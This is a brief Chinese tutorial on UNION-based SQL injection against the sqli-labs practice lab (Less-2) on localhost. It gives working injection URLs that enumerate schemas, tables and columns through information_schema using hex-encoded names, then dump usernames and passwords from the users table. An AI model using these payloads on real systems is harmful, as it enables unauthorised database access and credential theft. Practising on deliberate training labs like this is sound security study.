SQL注入之高权限注入

1.注入流程与上节实例相同

查询所有数据库名称

http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata

查询数据库对应的表名

http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479

security库名转换16进制，等于：7365637572697479

查询表名对应的字段名

http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x7573657273

表名users转换16进制，等于：7573657273

查询数据

http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,username,password%20from%20security.users